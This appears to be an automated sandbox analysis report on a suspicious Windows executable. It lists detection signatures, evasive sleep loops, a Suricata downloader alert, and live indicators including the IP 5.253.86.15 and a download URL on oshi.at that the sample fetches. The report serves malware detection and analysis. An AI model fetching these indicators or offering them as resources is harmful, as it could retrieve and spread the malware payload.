
Windows Analysis Report
Ref#1550238.exe

Overview

General Information

Sample name: Ref#1550238.exe
Analysis ID: 1567423
MD5: a31bcf203bb60f13de83211ac9d44d06
SHA1: 8d559c68b94f38e6886f467080cbce53a2ae1654
SHA256: bd35a1c3b410026617e27fa3937f77f1a42ada6978afc36022e75c63677f897d
Tags: exe, user-abuse_ch

Detection

Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Machine Learning detection for sample
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files

Classification

  • System is w10x64
  • Ref#1550238.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\Ref#1550238.exe" MD5: A31BCF203BB60F13DE83211AC9D44D06)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp                        SID      Severity  Classtype        Source IP    Source Port  Destination IP  Destination Port  Protocol
2024-12-03T15:10:03.156977+0100  2803305  3         Unknown Traffic  192.168.2.7  49896        5.253.86.15     443               TCP
2024-12-03T15:10:08.451556+0100  2803305  3         Unknown Traffic  192.168.2.7  49927        5.253.86.15     443               TCP
2024-12-03T15:10:20.407125+0100  2803305  3         Unknown Traffic  192.168.2.7  49938        5.253.86.15     443               TCP
2024-12-03T15:10:28.874317+0100  2803305  3         Unknown Traffic  192.168.2.7  49965        5.253.86.15     443               TCP
2024-12-03T15:10:48.327359+0100  2803305  3         Unknown Traffic  192.168.2.7  49983        5.253.86.15     443               TCP
2024-12-03T15:10:59.577294+0100  2803305  3         Unknown Traffic  192.168.2.7  49985        5.253.86.15     443               TCP
2024-12-03T15:11:15.124157+0100  2803305  3         Unknown Traffic  192.168.2.7  49986        5.253.86.15     443               TCP
2024-12-03T15:11:35.999128+0100  2803305  3         Unknown Traffic  192.168.2.7  49989        5.253.86.15     443               TCP
2024-12-03T15:11:53.124045+0100  2803305  3         Unknown Traffic  192.168.2.7  49990        5.253.86.15     443               TCP
2024-12-03T15:12:08.833318+0100  2803305  3         Unknown Traffic  192.168.2.7  49993        5.253.86.15     443               TCP
2024-12-03T15:12:13.530479+0100  2803305  3         Unknown Traffic  192.168.2.7  49994        5.253.86.15     443               TCP
2024-12-03T15:12:24.397233+0100  2803305  3         Unknown Traffic  192.168.2.7  49995        5.253.86.15     443               TCP

AV Detection

Source: Ref#1550238.exe | ReversingLabs: Detection: 44%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: Ref#1550238.exe | Joe Sandbox ML: detected
Source: Ref#1550238.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49896 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49927 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49938 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49965 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49983 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49985 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49986 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49987 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49988 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49989 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49990 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49991 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49992 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49993 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49994 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49995 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49996 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49997 version: TLS 1.2
Source: Ref#1550238.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: global traffic | HTTP traffic detected: GET /EqqP HTTP/1.1 Host: oshi.at Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /EqqP HTTP/1.1 Host: oshi.at
Source: Joe Sandbox View | IP Address: 5.253.86.15
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49896 -> 5.253.86.15:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49995 -> 5.253.86.15:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49986 -> 5.253.86.15:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49985 -> 5.253.86.15:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49994 -> 5.253.86.15:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49989 -> 5.253.86.15:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49938 -> 5.253.86.15:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49965 -> 5.253.86.15:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49983 -> 5.253.86.15:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49993 -> 5.253.86.15:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49990 -> 5.253.86.15:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49927 -> 5.253.86.15:443
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: oshi.at
Source: Ref#1550238.exe | String found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
Source: Ref#1550238.exe | String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
Source: Ref#1550238.exe, 00000000.00000002.3743212803.0000000006E6F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
Source: Ref#1550238.exe | String found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
Source: Ref#1550238.exe | String found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
Source: Ref#1550238.exe | String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
Source: Ref#1550238.exe | String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: Ref#1550238.exe | String found in binary or memory: http://ocsps.ssl.com0
Source: Ref#1550238.exe | String found in binary or memory: http://ocsps.ssl.com0?
Source: Ref#1550238.exe | String found in binary or memory: http://ocsps.ssl.com0_
Source: Ref#1550238.exe, 00000000.00000002.3741808265.0000000003349000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000337E000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000329C000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000032ED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://oshi.at
Source: Ref#1550238.exe, 00000000.00000002.3741808265.0000000003349000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000337E000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000329C000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000032ED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://oshi.atd
Source: Ref#1550238.exe, 00000000.00000002.3741808265.0000000003285000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Ref#1550238.exe | String found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
Source: Ref#1550238.exe | String found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
Source: Ref#1550238.exe, 00000000.00000002.3741808265.0000000003285000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oshi.at
Source: Ref#1550238.exe, 00000000.00000002.3741808265.0000000003211000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oshi.at/EqqP
Source: Ref#1550238.exe, 00000000.00000002.3741808265.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.0000000003349000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000337E000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000032ED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oshi.atD
Source: Ref#1550238.exe | String found in binary or memory: https://www.ssl.com/repository0
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown | Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown | Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown | Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown | Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown | Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown | Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown | Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49987
Source: C:\Users\user\Desktop\Ref#1550238.exe | Code function: 0_2_0164DA1C
Source: C:\Users\user\Desktop\Ref#1550238.exe | Code function: 0_2_056FAAF8
Source: C:\Users\user\Desktop\Ref#1550238.exe | Code function: 0_2_056F0568
Source: C:\Users\user\Desktop\Ref#1550238.exe | Code function: 0_2_056F0558
Source: C:\Users\user\Desktop\Ref#1550238.exe | Code function: 0_2_056FC550
Source: C:\Users\user\Desktop\Ref#1550238.exe | Code function: 0_2_056FC9C8
Source: C:\Users\user\Desktop\Ref#1550238.exe | Code function: 0_2_056FC9B8
Source: C:\Users\user\Desktop\Ref#1550238.exe | Code function: 0_2_056FAAE8
Source: C:\Users\user\Desktop\Ref#1550238.exe | Code function: 0_2_056FAA83
Source: Ref#1550238.exe | Static PE information: invalid certificate
Source: Ref#1550238.exe, 00000000.00000000.1286681409.0000000000E22000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameRef.exe8 vs Ref#1550238.exe
Source: Ref#1550238.exe, 00000000.00000002.3741306291.00000000013CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Ref#1550238.exe
Source: Ref#1550238.exe | Binary or memory string: OriginalFilenameRef.exe8 vs Ref#1550238.exe
Source: classification engine | Classification label: mal56.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\Ref#1550238.exe | Mutant created: NULL
Source: Ref#1550238.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Ref#1550238.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\Ref#1550238.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Ref#1550238.exe | Section loaded: gpapi.dll
Source: Ref#1550238.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: C:\Users\user\Desktop\Ref#1550238.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\Ref#1550238.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\Ref#1550238.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Ref#1550238.exe | Memory allocated: 15E0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Ref#1550238.exe | Memory allocated: 3210000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Ref#1550238.exe | Memory allocated: 3000000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Ref#1550238.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Ref#1550238.exe | Window / User API: threadDelayed 2592
Source: C:\Users\user\Desktop\Ref#1550238.exe | Window / User API: threadDelayed 7196
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep count: 38 > 30
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -35048813740048126s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -99859s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7584 | Thread sleep count: 2592 > 30
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7588 | Thread sleep count: 7196 > 30
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -99749s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -99640s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -99531s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -99422s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -99304s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -99187s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -99078s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -98968s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -98858s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -98750s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -98604s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -98497s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -98387s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -98276s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -98171s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -98039s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -97916s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -97812s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -97703s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -97592s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -97484s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -97375s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -97265s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -97155s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -97046s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -96937s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -96828s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -96718s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -96609s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -96500s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -96390s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552 | Thread sleep time: -96281s >= -30000s
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -96172s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -96062s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -95953s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -95840s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -95734s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -95624s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -95491s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -95273s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -95157s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -95000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -94890s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -94781s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -94672s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -94547s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -94437s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -94328s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 100000Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 99859Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 99749Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 99640Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 99531Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 99422Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 99304Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 99187Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 99078Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 98968Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 98858Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 98750Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 98604Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 98497Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 98387Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 98276Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 98171Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 98039Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 97916Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 97812Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 97703Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 97592Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 97484Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 97375Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 97265Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 97155Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 97046Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 96937Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 96828Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 96718Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 96609Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 96500Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 96390Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 96281Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 96172Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 96062Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 95953Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 95840Jump to behavior
